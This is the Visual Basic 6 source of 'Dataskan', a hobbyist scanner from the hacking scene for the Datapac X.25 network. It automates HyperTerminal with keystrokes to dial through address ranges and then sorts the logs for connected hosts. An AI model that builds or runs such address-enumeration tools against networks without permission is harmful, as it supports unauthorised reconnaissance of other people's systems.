Left = 1680 TabIndex = 8 Top = 1560 Width = 495 End Begin VB.Menu mnufile Caption = "&File" Begin VB.Menu mnuexit Caption = "&Exit" Shortcut = ^Q End End Begin VB.Menu mnulist Caption = "&Lists" Begin VB.Menu mnuuselist Caption = "&Use List" Shortcut = ^U End Begin VB.Menu mnucreatelist Caption = "&Create List" Shortcut = ^C End End Begin VB.Menu mnulogs Caption = "&Logs" End Begin VB.Menu mnuactions Caption = "&Scanning" Begin VB.Menu mnustart Caption = "&Start Scan" Shortcut = ^S End Begin VB.Menu mnustop Caption = "&Stop Scan" Shortcut = ^B End End Begin VB.Menu mnuhelp Caption = "&Help" End End Attribute VB_Name = "Form1" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False ' --------------- | | ^ |\ | ' / | / / \ | \ | ' / | / / \ | \ | ' / | / / \ | \ | ' | | / / \ | \ | ' | | / / \ | \ | ' | | / 
/ \ | \ | ' | | / / \ | \ | ' \_____________ |/_ / \ | \ | ' \ | \ |---------------| | \ | ' \ | \ | | | \ | ' \ | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' | | \ | | | \ | ' / | | | | | \ | ' / | | | | | \ | ' _______________/ | | | | | \| ' SKAN THE PLANET ' ' 'i am not going to make this program bug proof. It is by far from bug proof. I know 'that there's some faulty code in here, but im not going to make this thing industrial 'strength (we are using sendkeys() to scan for heaven sakes!) 'kind of quick, and only a little bit dirty. Not like mcDonalds.. more like Dairy Queen(tm). ' 'This code was designed like this: First I wrote it so all it does is send addresses 'to hyperterminal, then I added better timing with the timers, and then I added the start 'and stop times. I didnt plan this. I just started writing. This means i've patched up, 'and written logic statements over other logic statements wrapping a few of them together. 'sorry for the sloppyness. ' 'this was designed for how hyperterminal handles datapac Option Explicit Public stop_scan, send_period, range_flag, list_phlag, timerflag, extraflag As Boolean Public stop_time, time_to_start As String 'these two variables are declared here and is only used in the log analysis in the 'timer2 fuction. they are declared here because 'we dont want to have to constantly be re-declaring it 'in the function. This might cause the function to slow down by a few miliseconds. 'while this doesnt sound like much, it can add up if we are doing a list with 2 million 'addresses Public analyze_line As String Public analyze_counter As Integer Public cartrage_returns, wait_seconds, address_seconds As Integer Public from_address, to_address, difference, line_whore, line_gore, range As Integer Public i As Integer Private Sub cmdhelp_Click() MsgBox "This program was made by aftermath. 
For more help see the html document entitled ""readme.htm""", vbInformation, "Made by.." End Sub Private Sub chkextra_Click() If chkextra.Value = Checked Then txtextra.Enabled = True txtcompletion.Enabled = True Frame6.Enabled = True Frame3.Enabled = True Else txtextra.Enabled = False txtcompletion.Enabled = False Frame6.Enabled = False Frame3.Enabled = False End If End Sub Private Sub chkfrom_Click() If chkfrom.Value = Checked Then txtfromhours.Enabled = False txtfromminutes.Enabled = False txtfromseconds.Enabled = False txtfromampm.Enabled = False Else txtfromhours.Enabled = True txtfromminutes.Enabled = True txtfromseconds.Enabled = True txtfromampm.Enabled = True End If End Sub Private Sub chklist_Click() If chklist.Value = Checked Then Frame1.Enabled = False txtrange.Enabled = False txtto.Enabled = False cmdcommon1.Enabled = True txtfrom.Enabled = False Label1.Enabled = False txtlist.Enabled = True Label17.Enabled = True mnuuselist.Checked = True Else Frame1.Enabled = True cmdcommon1.Enabled = False mnuuselist.Checked = False txtrange.Enabled = True txtto.Enabled = True txtfrom.Enabled = True Label1.Enabled = True txtlist.Enabled = False Label17.Enabled = False End If End Sub Private Sub chkstop_Click() If chkstop.Value = Checked Then txthour.Enabled = False txtminute.Enabled = False txtsecond.Enabled = False txtampm.Enabled = False Else txthour.Enabled = True txtminute.Enabled = True txtsecond.Enabled = True txtampm.Enabled = True End If End Sub Private Sub cmdcommon1_Click() CommonDialog1.ShowOpen txtlist.Text = CommonDialog1.FileName End Sub Private Sub cmdstart_Click() extraflag = False line_gore = 0 stop_scan = False cmdstop.Default = True send_period = False stop_time = txthour.Text & ":" & txtminute.Text & ":" & txtsecond.Text & " " & txtampm.Text wait_seconds = txtseconds.Text & "000" Timer1.Interval = wait_seconds 'we set the second timer to the amount of seconds the user 'wants to try to send addresses 'address_seconds = txtconnectwait.Text 
    'Timer2.Interval = address_seconds
    from_address = txtfrom.Text
    i = from_address
    If timerflag = False Then
        If chkfrom.Value = Unchecked Then
            'here we WAIT untill it is arr time t0 g0
            time_to_start = txtfromhours.Text & ":" & txtfromminutes.Text & ":" & txtfromseconds & " " & txtfromampm
            Timer3.Interval = 500
            Timer3.Enabled = True
            DoEvents
            Exit Sub
        End If
    End If
    If chklist.Value = Checked Then
        'ok, so we are using a list. we are going to find out how long the list is
        'i havent debuged this part yet. if the user doesnt place his file right, then skroo him.
        If list_phlag = False Then
            Open txtlist.Text For Input As #1
            'dummy is just some dummy data. we dont really need it. all we really need
            'is a counter to tell us how many lines the phile is
            Dim dummy
            Do Until EOF(1)
                Line Input #1, dummy
                line_whore = line_whore + 1
            Loop
            Close #1
            Open txtlist.Text For Input As #3
        End If
    End If
    If chkfrom.Value = Checked Then
        DoEvents
        Timer1.Enabled = True
        DoEvents
    End If
End Sub

Private Sub cmdstop_Click()
    line_whore = 0
    Close
    stop_scan = True
End Sub

Private Sub mnucreatelist_Click()
    Form2.Show
End Sub

Private Sub mnuexit_Click()
    Timer1.Enabled = False
    Timer2.Enabled = False
    End
End Sub

Private Sub mnuhelp_Click()
    frmAbout.Show
End Sub

Private Sub mnulog_Click()
    Form3.Show
End Sub

Private Sub mnulogs_Click()
    Form3.Show
End Sub

Private Sub mnustart_Click()
    Call cmdstart_Click
End Sub

Private Sub mnustop_Click()
    Call cmdstop_Click
End Sub

Private Sub mnuuselist_Click()
    If mnuuselist.Checked = False Then
        mnuuselist.Checked = True
        chklist.Value = Checked
        Exit Sub
    End If
    If mnuuselist.Checked = True Then
        mnuuselist.Checked = False
        chklist.Value = Unchecked
    End If
End Sub

Private Sub Picture1_Click()
    Shell ("cmd.exe /c explorer.exe http://hackcanada.com/canadian/hacking/"), vbHide
End Sub

Private Sub Timer1_Timer()
    'here we wait for x amount of seconds before we send
    'the period (.) character to the screen.
    'this gives the haqhur a few seconds to change their
    'screen to the terminal client program
    If stop_scan = True Or stop_time = Time Then
        Timer1.Enabled = False
        Timer2.Enabled = False
        Exit Sub
    End If
    Timer1.Interval = txtconnectwait.Text
    DoEvents
    Timer2.Interval = txtconnectwait.Text
    DoEvents
    'this if statement cheqs the awesome stupid thing where if there is something
    'else that you must send to the modem, it will g3t sent first
    If extraflag = False Then
        If txtextra.Text <> "" Then
            extraflag = True
            'MsgBox "in txtextra if"
            Dim drive_letter, modem_data As String
            drive_letter = Mid(App.Path, 1, 3)
            'MsgBox "drive letter: " & drive_letter
            DoEvents
            Open drive_letter & "temp0r4r0r13.sys" For Output As #4
            DoEvents
            Print #4, txtextra.Text
            'MsgBox "printing.."
            DoEvents
            Close #4
            DoEvents
            Open drive_letter & "temp0r4r0r13.sys" For Input As #4
            Do Until EOF(4)
                DoEvents
                Line Input #4, modem_data
                'MsgBox "modem data; " & modem_data
                DoEvents
                SendKeys (modem_data & vbCr)
                DoEvents
            Loop
            Close #4
            DoEvents
        End If
    End If
    'if the checkbox is checked, then we send the period key (this
    'is to initate the datapac connection)
    If chkperiod.Value = Checked And send_period = False Then
        send_period = True
        SendKeys (".")
    End If
    DoEvents
    If chklist.Value = Unchecked Then
        'if there is nothing in the from and too boxes, we fuqin do that shit up
        If txtfrom.Text = "" Or txtto.Text = "" Then
            MsgBox "Must have addresses set", vbCritical, "Error"
            Timer1.Enabled = False
            Timer2.Enabled = False
            Exit Sub
        End If
        'putting these thugs into variables
        If IsNumeric(txtrange.Text) = False Then
            MsgBox "Enter the range", vbInformation, "Non-numeric Range"
            Timer1.Enabled = False
            Timer2.Enabled = False
            Exit Sub
        End If
        range = txtrange.Text
        to_address = txtto.Text
        difference = to_address - from_address
        If from_address > 9999 Or to_address > 9999 Then
            MsgBox "Can not scan more than 9999 addresses at a time", vbCritical, "ERROR!"
            Timer1.Enabled = False
            Timer2.Enabled = False
            Exit Sub
        End If
        'if that address is less than zero, then bah. dat shit aint right
        If from_address < 0 Or to_address < 0 Or difference < 0 Then
            MsgBox "Cannot scan backwards.", vbCritical, "Error"
            Timer1.Enabled = False
            Timer2.Enabled = False
            Exit Sub
        End If
        'enabling the second timer.. 3..2..1.. liftoff!
        DoEvents
        If i <= to_address Then
            Timer2.Enabled = True
            i = i + 1
            DoEvents
        Else
            Timer2.Enabled = False
            Timer1.Enabled = False
            Call wrap_up
            MsgBox "SKAN RANGE COMPLETE!", vbInformation, "SKAN DUN"
        End If
        DoEvents
        Timer1.Enabled = False
    Else
        Timer2.Enabled = True
        Timer1.Enabled = False
    End If
    DoEvents
End Sub

Private Sub Timer2_Timer()
    'this is where we do the actual sendkeys
    Dim x As Integer
    Dim address
    If stop_scan = True Then
        Timer1.Enabled = False
        Timer2.Enabled = False
        MsgBox "DONE!", vbInformation, "USER STOPED SKAN!"
        Exit Sub
    End If
    DoEvents
    If chkstop.Value = Unchecked Then
        If stop_time = Time$ Then
            Call wrap_up
            Timer1.Enabled = False
            Timer2.Enabled = False
            MsgBox "TIME'S UP!", vbInformation, "TIME!"
            Exit Sub
        End If
    End If
    DoEvents
    If chklist.Value = Unchecked Then
        If i < 10 Then address = range & "000" & i
        If i >= 10 Then address = range & "00" & i
        If i >= 100 Then address = range & "0" & i
        If i >= 1000 Then address = range & i
        DoEvents
        'updating where the last address was in the scan range
        txtfrom.Text = Mid(address, 5)
        DoEvents
    Else
        line_gore = line_gore + 1
        Line Input #3, address
        If line_gore >= line_whore Then
            MsgBox "LIST COMPLETE!", vbInformation, "COMPLETE!"
            Call wrap_up
            Timer1.Enabled = False
            Timer2.Enabled = False
            Timer3.Enabled = False
            Close #3
            Exit Sub
        End If
        list_phlag = True
    End If
    SendKeys (address)
    DoEvents
    If cartrage_returns = 0 Then cartrage_returns = 1
    'for the cartrage returns
    For x = 0 To cartrage_returns
        SendKeys (vbCrLf)
        DoEvents
    Next x
    DoEvents
    DoEvents
    Timer2.Enabled = False
    DoEvents
    Timer1.Enabled = True
    DoEvents
End Sub

Private Sub Timer3_Timer()
    If time_to_start = Time Then
        Timer3.Enabled = False
        timerflag = True
        If list_phlag = False Then
            If chklist.Value = Checked Then
                '(Redundent code, i know i know)
                'ok, so we are using a list. we are going to find out how long the list is
                'i havent debuged this part yet. if the user doesnt place his file right,
                'then skroo him.
                Open txtlist.Text For Input As #1
                'dummy is just some dummy data. we dont really need it. all we
                'really need is a counter to tell us how many lines the phile is
                Dim dummy
                Do Until EOF(1)
                    Line Input #1, dummy
                    line_whore = line_whore + 1
                Loop
                Close #1
            End If
            Open txtlist.Text For Input As #1
        End If
        Timer1.Enabled = True
        Exit Sub
    End If
End Sub

Private Sub txtampm_Change()
    Dim uprcase
    uprcase = txtampm.Text
    uprcase = UCase(uprcase)
    txtampm.Text = uprcase
End Sub

Private Sub txtfrom_Change()
    If txtfrom.Text >= "9999" Then
        MsgBox "You cannot scan higher than 9999"
        txtfrom.Text = "0000"
    End If
End Sub

Private Sub txtrange_Click()
    If range_flag = False Then
        txtrange.Text = ""
        range_flag = True
    End If
End Sub

Private Sub txtto_Change()
    If txtto.Text > "9999" Then
        MsgBox "You cannot scan higher than 9999"
        txtto.Text = "9999"
    End If
End Sub

Private Sub wrap_up()
    'this function executes at the end of a scan. it sends data to the modem
    '(if you want it t0)
    Dim pbath, wrap_up_string As String
    If chkextra.Value = Checked Then
        pbath = Mid(App.Path, 1, 3)
        Open pbath & "tempwh0rzari3.sys" For Output As #1
        DoEvents
        wrap_up_string = txtcompletion.Text
        Print #1, wrap_up_string
        DoEvents
        Close #1
        DoEvents
        Open pbath & "tempwh0rzari3.sys" For Input As #1
        DoEvents
        Do Until EOF(1)
            Line Input #1, wrap_up_string
            DoEvents
            SendKeys (wrap_up_string)
            DoEvents
        Loop
        DoEvents
        Close #1
        DoEvents
        Shell ("cmd.exe /c del " & pbath & "tempwh0rzari3.sys"), vbHide
    End If
End Sub

- Form2.FRM:

VERSION 5.00
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form2
   BorderStyle = 1 'Fixed Single
   Caption = "Make List"
   ClientHeight = 3180
   ClientLeft = 1365
   ClientTop = 1650
   ClientWidth = 3450
   Icon = "Form2.frx":0000
   LinkTopic = "Form2"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 3180
   ScaleWidth = 3450
   Begin MSComDlg.CommonDialog CommonDialog1
      Left = 2880
      Top = 1080
      _ExtentX = 847
      _ExtentY = 847
      _Version = 393216
   End
   Begin VB.CheckBox chkappend
      Caption = "append to the lsit"
      Height = 255
      Left = 0
      TabIndex = 9
      ToolTipText = $"Form2.frx":0442
      Top = 1200
      Width = 3375
   End
   Begin VB.Frame Frame1
      Caption = "Save to:"
      Height = 615
      Left = 0
      TabIndex = 7
      Top = 1440
      Width = 3375
      Begin VB.CommandButton Command1
         Caption = "..."
         Height = 255
         Left = 3000
         TabIndex = 13
         Top = 240
         Width = 255
      End
      Begin VB.TextBox txtloc
         Height = 285
         Left = 120
         TabIndex = 8
         Text = "c:\dataskan-list.txt"
         Top = 240
         Width = 2775
      End
   End
   Begin VB.CommandButton cmdcreate
      Caption = "Create"
      Default = -1 'True
      Height = 615
      Left = 2280
      TabIndex = 5
      Top = 480
      Width = 1095
   End
   Begin VB.TextBox txtto
      Height = 285
      Left = 840
      TabIndex = 2
      Text = "10999999"
      ToolTipText = "Ending number (example: 11119999)"
      Top = 840
      Width = 1335
   End
   Begin VB.TextBox txtfrom
      Height = 285
      Left = 840
      TabIndex = 1
      Text = "10000000"
      ToolTipText = "starting number (example: 11110000)"
      Top = 480
      Width = 1335
   End
   Begin VB.CheckBox chkrandomize
      Caption = "Randomize"
      Enabled = 0 'False
      Height = 495
      Left = 2160
      TabIndex = 0
      ToolTipText = "Randomize does not work"
      Top = 0
      Width = 1335
   End
   Begin VB.Label Label6
      Caption = $"Form2.frx":0512
      Height = 615
      Left = 0
      TabIndex = 12
      Top = 2520
      Width = 3375
   End
   Begin VB.Label lblstatus
      BorderStyle = 1 'Fixed Single
      Caption = "Status.."
      Height = 255
      Left = 0
      TabIndex = 11
      Top = 2160
      Width = 3375
   End
   Begin VB.Label Label5
      Caption = "Status:"
      Height = 255
      Left = 0
      TabIndex = 10
      Top = 2520
      Width = 495
   End
   Begin VB.Label Label4
      Caption = "Make List.."
      BeginProperty Font
         Name = "Arial"
         Size = 18
         Charset = 0
         Weight = 700
         Underline = 0 'False
         Italic = 0 'False
         Strikethrough = 0 'False
      EndProperty
      Height = 375
      Left = 0
      TabIndex = 6
      Top = 0
      Width = 2055
   End
   Begin VB.Label Label3
      Caption = "To:"
      Height = 255
      Left = 0
      TabIndex = 4
      Top = 840
      Width = 735
   End
   Begin VB.Label Label2
      Caption = "From:"
      Height = 255
      Left = 0
      TabIndex = 3
      Top = 480
      Width = 735
   End
End
Attribute VB_Name = "Form2"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'this is the list creation code
'
'
Private Sub cmdcreate_Click()
    lblstatus.Caption = "Generating list.."
    Dim startnum, endnum, i, num1, phile_size As Integer
    Dim listloc, range, tempon, address, app_path, drive_letter As String
    Dim phlag1, phlag2, phlag3 As Boolean
    'putting whats in the txt boxes into variables
    startnum = txtfrom.Text
    endnum = txtto.Text
    listloc = txtloc.Text
    'if startnum > endnum then.. you get the idea
    If startnum >= endnum Then
        MsgBox "Starting number cannot be greater than ending number!", vbCritical, "ERROR!"
        Exit Sub
    End If
    'if the user has chosen to append to the file, then we open as append
    If chkappend.Value = Checked Then
        Open listloc For Append As #1
    Else
        Open listloc For Output As #1
    End If
    DoEvents
    'start of a loop
    For i = startnum To endnum
        DoEvents
        'putting number of loop into another extra varialbe
        num1 = i
        'adding the extra zeros if they are needed
        If num1 < 10 Then num1 = num1 & "000"
        If num1 < 100 Then num1 = num1 & "00"
        If num1 < 1000 Then num1 = num1 & "0"
        tempon = CStr(num1)
        If tempon = "0" Then tempon = "0000"
        'the address = the range and the number converted into a string
        address = range & tempon
        'printing the address
        Print #1, address
        On Error Resume Next
        phile_size = phile_size + 1
        DoEvents
    Next i
    Close #1
    DoEvents
    lblstatus.Caption = "Done Generating list."
End Sub

Private Sub Command1_Click()
    CommonDialog1.ShowSave
    txtloc.Text = CommonDialog1.FileName
End Sub

- Form3.FRM:

VERSION 5.00
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Form3
   BorderStyle = 1 'Fixed Single
   Caption = "Log Sorter"
   ClientHeight = 4080
   ClientLeft = 1695
   ClientTop = 2025
   ClientWidth = 6075
   Icon = "Form3.frx":0000
   LinkTopic = "Form3"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 4080
   ScaleWidth = 6075
   Begin MSComDlg.CommonDialog CommonDialog1
      Left = 2760
      Top = 1320
      _ExtentX = 847
      _ExtentY = 847
      _Version = 393216
   End
   Begin VB.TextBox txtresults
      Height = 1935
      Left = 0
      MultiLine = -1 'True
      ScrollBars = 2 'Vertical
      TabIndex = 3
      Text = "Form3.frx":0442
      ToolTipText = "Results are displayed here"
      Top = 1320
      Width = 6015
   End
   Begin VB.CommandButton cmdsort
      Caption = "Sort!"
      Height = 495
      Left = 0
      TabIndex = 2
      ToolTipText = "sort the file"
      Top = 720
      Width = 6015
   End
   Begin VB.Frame Frame1
      Caption = "Location of log to sort:"
      Height = 615
      Left = 0
      TabIndex = 0
      Top = 0
      Width = 6015
      Begin VB.CommandButton cmdpathcapture
         Caption = "..."
         Height = 255
         Left = 5640
         TabIndex = 4
         Top = 240
         Width = 255
      End
      Begin VB.TextBox txtpath
         Height = 285
         Left = 120
         TabIndex = 1
         Text = "C:\Documents and Settings\Administrator\CAPTURE.TXT"
         ToolTipText = "path to the terminal client log"
         Top = 240
         Width = 5415
      End
   End
   Begin VB.Label Label2
      Caption = $"Form3.frx":044B
      Height = 615
      Left = 1080
      TabIndex = 6
      Top = 3360
      Width = 4935
   End
   Begin VB.Label Label1
      Caption = "NOTE:"
      BeginProperty Font
         Name = "MS Sans Serif"
         Size = 13.5
         Charset = 0
         Weight = 700
         Underline = 0 'False
         Italic = 0 'False
         Strikethrough = 0 'False
      EndProperty
      Height = 495
      Left = 0
      TabIndex = 5
      Top = 3480
      Width = 975
   End
End
Attribute VB_Name = "Form3"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'this is the log code. it will sort out the logs and tell you how many
'of what had been found
Private Sub cmdopen_Click()
    CommonDialog1.ShowOpen
    txtpath.Text = CommonDialog1.FileName
End Sub

Private Sub cmdpathcapture_Click()
    CommonDialog1.ShowSave
    txtpath.Text = CommonDialog1.FileName
End Sub

Private Sub cmdsort_Click()
    txtresults.Text = ""
    Dim data_line As String
    Dim line_num, busy, not_in_service, barred, not_responding, possible_error, found As Double
    Dim i As Double
    DoEvents
    Open txtpath.Text For Input As #1
    For i = 0 To 10000
        DoEvents
    Next i
    DoEvents
    Do Until EOF(1)
        line_num = line_num + 1
        Line Input #1, data_line
        DoEvents
        If InStr(1, data_line, "address not in service", vbTextCompare) <> 0 Then
            not_in_service = not_in_service + 1
        End If
        DoEvents
        If InStr(1, data_line, "destination busy", vbTextCompare) <> 0 Then
            busy = busy + 1
        End If
        DoEvents
        If InStr(1, data_line, "access barred", vbTextCompare) <> 0 Then
            barred = barred + 1
        End If
        DoEvents
        If InStr(1, data_line, "re-enter", vbTextCompare) <> 0 Or InStr(1, data_line, "invalid address", vbTextCompare) Or InStr(1, data_line, "incompatible call options", vbTextCompare) <> 0 Or InStr(1, data_line, "invalid command", vbTextCompare) <> 0 Then
            possible_error = possible_error + 1
        End If
        DoEvents
        If InStr(1, data_line, " not responding", vbTextCompare) <> 0 Then
            not_responding = not_responding + 1
        End If
        DoEvents
        If InStr(1, data_line, "call connected", vbTextCompare) <> 0 Then
            DoEvents
            found = found + 1
            DoEvents
            txtresults.Text = vbCrLf & txtresults.Text & data_line & " ON FILE LINE: " & line_num & vbCrLf
            DoEvents
        End If
        DoEvents
    Loop
    DoEvents
    Close #1
    DoEvents
    txtresults.Text = txtresults.Text & vbCrLf
    txtresults.Text = txtresults.Text & vbCrLf
    txtresults.Text = txtresults.Text & vbCrLf & "NOT IN SERVICE: " & not_in_service
    txtresults.Text = txtresults.Text & vbCrLf & "BUSY: " & busy
    txtresults.Text = txtresults.Text & vbCrLf & "BARRED: " & barred
    txtresults.Text = txtresults.Text & vbCrLf & "NOT RESPONDING: " & not_responding
    txtresults.Text = txtresults.Text & vbCrLf & "POSSIBLE ERRORS: " & possible_error
    txtresults.Text = txtresults.Text & vbCrLf & "TOTAL LINES CHECKED: " & line_num
    txtresults.Text = txtresults.Text & vbCrLf & "FOUND: " & found
    DoEvents
    MsgBox "DONE SORT!", vbInformation, "DONE SORT!"
End Sub

Private Sub cmdsortpath_Click()
    CommonDialog1.ShowSave
    txtoutput.Text = CommonDialog1.FileName
End Sub

- frmAbout.FRM:

VERSION 5.00
Begin VB.Form frmAbout
   BorderStyle = 3 'Fixed Dialog
   Caption = "About Dataskan"
   ClientHeight = 3450
   ClientLeft = 2040
   ClientTop = 2415
   ClientWidth = 6105
   ClipControls = 0 'False
   Icon = "frmAbout.frx":0000
   LinkTopic = "Form2"
   MaxButton = 0 'False
   MinButton = 0 'False
   ScaleHeight = 2381.251
   ScaleMode = 0 'User
   ScaleWidth = 5732.911
   ShowInTaskbar = 0 'False
   Begin VB.PictureBox Picture1
      Height = 3375
      Left = 4320
      Picture = "frmAbout.frx":0442
      ScaleHeight = 3315
      ScaleWidth = 1635
      TabIndex = 6
      ToolTipText = "this guy looks pissed off."
      Top = 0
      Width = 1695
   End
   Begin VB.PictureBox picIcon
      AutoSize = -1 'True
      ClipControls = 0 'False
      Height = 3075
      Left = -120
      Picture = "frmAbout.frx":14304
      ScaleHeight = 2117.535
      ScaleMode = 0 'User
      ScaleWidth = 790.125
      TabIndex = 1
      ToolTipText = "nofx is cool"
      Top = 240
      Width = 1185
   End
   Begin VB.CommandButton cmdOK
      Cancel = -1 'True
      Caption = "OK"
      Default = -1 'True
      Height = 585
      Left = 2760
      TabIndex = 0
      Top = 120
      Width = 1380
   End
   Begin VB.Line Line1
      BorderColor = &H00808080&
      BorderStyle = 6 'Inside Solid
      Index = 1
      X1 = 1126.862
      X2 = 3831.331
      Y1 = 1656.522
      Y2 = 1656.522
   End
   Begin VB.Label lblDescription
      Caption = $"frmAbout.frx":1F64A
      ForeColor = &H00000000&
      Height = 1410
      Left = 1170
      TabIndex = 2
      Top = 885
      Width = 3165
   End
   Begin VB.Label lblTitle
      Caption = "Application Title"
      ForeColor = &H00000000&
      Height = 480
      Left = 1170
      TabIndex = 4
      Top = 0
      Width = 3165
   End
   Begin VB.Line Line1
      BorderColor = &H00FFFFFF&
      BorderWidth = 2
      Index = 0
      X1 = 1014.176
      X2 = 3944.018
      Y1 = 1656.522
      Y2 = 1656.522
   End
   Begin VB.Label lblVersion
      Caption = "Version"
      Height = 225
      Left = 1170
      TabIndex = 5
      Top = 540
      Width = 3165
   End
   Begin VB.Label lblDisclaimer
      Caption = $"frmAbout.frx":1F762
      ForeColor = &H00000000&
      Height = 1065
      Left = 1080
      TabIndex = 3
      Top = 2400
      Width = 3150
   End
End
Attribute VB_Name = "frmAbout"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit

' Reg Key Security Options...
Const READ_CONTROL = &H20000
Const KEY_QUERY_VALUE = &H1
Const KEY_SET_VALUE = &H2
Const KEY_CREATE_SUB_KEY = &H4
Const KEY_ENUMERATE_SUB_KEYS = &H8
Const KEY_NOTIFY = &H10
Const KEY_CREATE_LINK = &H20
Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + _
                       KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + _
                       KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL

' Reg Key ROOT Types...
Const HKEY_LOCAL_MACHINE = &H80000002
Const ERROR_SUCCESS = 0
Const REG_SZ = 1  ' Unicode nul terminated string
Const REG_DWORD = 4  ' 32-bit number

Const gREGKEYSYSINFOLOC = "SOFTWARE\Microsoft\Shared Tools Location"
Const gREGVALSYSINFOLOC = "MSINFO"
Const gREGKEYSYSINFO = "SOFTWARE\Microsoft\Shared Tools\MSINFO"
Const gREGVALSYSINFO = "PATH"

Private Declare Function RegOpenKeyEx Lib "advapi32" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, ByRef phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, ByRef lpType As Long, ByVal lpData As String, ByRef lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32" (ByVal hKey As Long) As Long

Private Sub cmdSysInfo_Click()
    Call StartSysInfo
End Sub

Private Sub cmdOK_Click()
    Unload Me
End Sub

Private Sub Form_Load()
    Me.Caption = "About " & App.Title
    lblVersion.Caption = "Version " & App.Major & "." & App.Minor & "." & App.Revision
    lblTitle.Caption = App.Title
End Sub

Public Sub StartSysInfo()
    On Error GoTo SysInfoErr

    Dim rc As Long
    Dim SysInfoPath As String

    ' Try To Get System Info Program Path\Name From Registry...
    If GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFO, gREGVALSYSINFO, SysInfoPath) Then
    ' Try To Get System Info Program Path Only From Registry...
    ElseIf GetKeyValue(HKEY_LOCAL_MACHINE, gREGKEYSYSINFOLOC, gREGVALSYSINFOLOC, SysInfoPath) Then
        ' Validate Existance Of Known 32 Bit File Version
        If (Dir(SysInfoPath & "\MSINFO32.EXE") <> "") Then
            SysInfoPath = SysInfoPath & "\MSINFO32.EXE"
        ' Error - File Can Not Be Found...
        Else
            GoTo SysInfoErr
        End If
    ' Error - Registry Entry Can Not Be Found...
    Else
        GoTo SysInfoErr
    End If

    Call Shell(SysInfoPath, vbNormalFocus)

    Exit Sub
SysInfoErr:
    MsgBox "System Information Is Unavailable At This Time", vbOKOnly
End Sub

Public Function GetKeyValue(KeyRoot As Long, KeyName As String, SubKeyRef As String, ByRef KeyVal As String) As Boolean
    Dim i As Long  ' Loop Counter
    Dim rc As Long  ' Return Code
    Dim hKey As Long  ' Handle To An Open Registry Key
    Dim hDepth As Long  '
    Dim KeyValType As Long  ' Data Type Of A Registry Key
    Dim tmpVal As String  ' Tempory Storage For A Registry Key Value
    Dim KeyValSize As Long  ' Size Of Registry Key Variable
    '------------------------------------------------------------
    ' Open RegKey Under KeyRoot {HKEY_LOCAL_MACHINE...}
    '------------------------------------------------------------
    rc = RegOpenKeyEx(KeyRoot, KeyName, 0, KEY_ALL_ACCESS, hKey)  ' Open Registry Key

    If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError  ' Handle Error...

    tmpVal = String$(1024, 0)  ' Allocate Variable Space
    KeyValSize = 1024  ' Mark Variable Size

    '------------------------------------------------------------
    ' Retrieve Registry Key Value...
    '------------------------------------------------------------
    rc = RegQueryValueEx(hKey, SubKeyRef, 0, _
                         KeyValType, tmpVal, KeyValSize)  ' Get/Create Key Value

    If (rc <> ERROR_SUCCESS) Then GoTo GetKeyError  ' Handle Errors

    If (Asc(Mid(tmpVal, KeyValSize, 1)) = 0) Then  ' Win95 Adds Null Terminated String...
        tmpVal = Left(tmpVal, KeyValSize - 1)  ' Null Found, Extract From String
    Else  ' WinNT Does NOT Null Terminate String...
        tmpVal = Left(tmpVal, KeyValSize)  ' Null Not Found, Extract String Only
    End If
    '------------------------------------------------------------
    ' Determine Key Value Type For Conversion...
    '------------------------------------------------------------
    Select Case KeyValType  ' Search Data Types...
    Case REG_SZ  ' String Registry Key Data Type
        KeyVal = tmpVal  ' Copy String Value
    Case REG_DWORD  ' Double Word Registry Key Data Type
        For i = Len(tmpVal) To 1 Step -1  ' Convert Each Bit
            KeyVal = KeyVal + Hex(Asc(Mid(tmpVal, i, 1)))  ' Build Value Char. By Char.
        Next
        KeyVal = Format$("&h" + KeyVal)  ' Convert Double Word To String
    End Select

    GetKeyValue = True  ' Return Success
    rc = RegCloseKey(hKey)  ' Close Registry Key
    Exit Function  ' Exit

GetKeyError:  ' Cleanup After An Error Has Occured...
    KeyVal = ""  ' Set Return Val To Empty String
    GetKeyValue = False  ' Return Failure
    rc = RegCloseKey(hKey)  ' Close Registry Key
End Function

- Project1.VBP:

Type=Exe
Form=Form1.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\System32\stdole2.tlb#OLE Automation
Form=Form2.frm
Form=frmAbout.frm
Form=Form3.frm
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="Dataskan"
ExeName32="dataskan.exe"
Path32="..\Binary"
Command32=""
Name="dataskan"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=8
AutoIncrementVer=1
ServerSupportFiles=0
VersionCompanyName="Aftermath"
VersionFileDescription="Datapac Scanner"
VersionLegalCopyright="Copyleft Feburary 2005"
VersionProductName="Dataskan"
